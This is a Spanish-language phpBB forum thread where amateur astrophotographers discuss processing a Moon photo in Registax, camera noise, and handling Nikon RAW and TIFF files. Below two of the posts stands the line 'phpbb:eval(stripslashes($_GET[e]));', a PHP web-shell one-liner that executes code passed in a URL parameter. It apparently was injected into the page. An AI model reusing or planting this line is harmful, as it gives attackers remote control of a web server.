Como subir foto?

Foro para publicación de astrofotografías hechas por aficionados.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Como subir foto?

Mensaje por m3ntol »

a misma imagen procesada con Registax forzando los wavelets. Quizá un poco exagerado el procesado:
[img]http://www.astrohenares.org/images/luna02.jpg[/img]
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Como subir foto?

Mensaje por astrolozano »

Un pelín forzado, sí. Pero.... ¡qué poco ruido! Yo le hago eso a la mía y sale más ruido que señal :lol: (podeis probar si os aburrís, si no ocurre me dais una alegría... que yo hasta casi octubre nda).

Va a ser verdad lo de que las Nikon digitales meten demasiado ruido a la imagen :?
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Como subir foto?

Mensaje por m3ntol »

Alvaro,
es verdad que al procesar tu foto el ruido estropea cualquier intento de sacar detalles.

Es curioso, no creo que sea tanto problema del CCD de tu cámara como del formato de compresión ha has utilizado con la foto. ¿No puedes tirar fotos el TIFF directamente? Seguro que en formato sin compresión desaparece todo ese ruido parásito.
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Como subir foto?

Mensaje por astrolozano »

Coñe, es verdad que la que subí era del jpg basic jeje. De todos modos, genera muchísimo ruido. A ver si coincidimos en Pioz y hacemos un día una comparativa.

Sí, las hago en modo RAW+Jpg basic (RAW por razones obvias, jpg para tener una copia "ligera" de cada foto).

Lo que pasa es que sigo sin saber como hacía para abrir las imágenes RAW de Nikon (formato NEF) en el Photoshop para pasarlo a TIFF; hubo una pequeña movida con Nikon que no liberaban como era el formato para tener que comprar el Nikon Photo Editor y esas cosas, pero salió un parche que no recuerdo. Y como paso de entretenerme antes de exámenes, pues aún no lo he buscado.

Saludos!!
Responder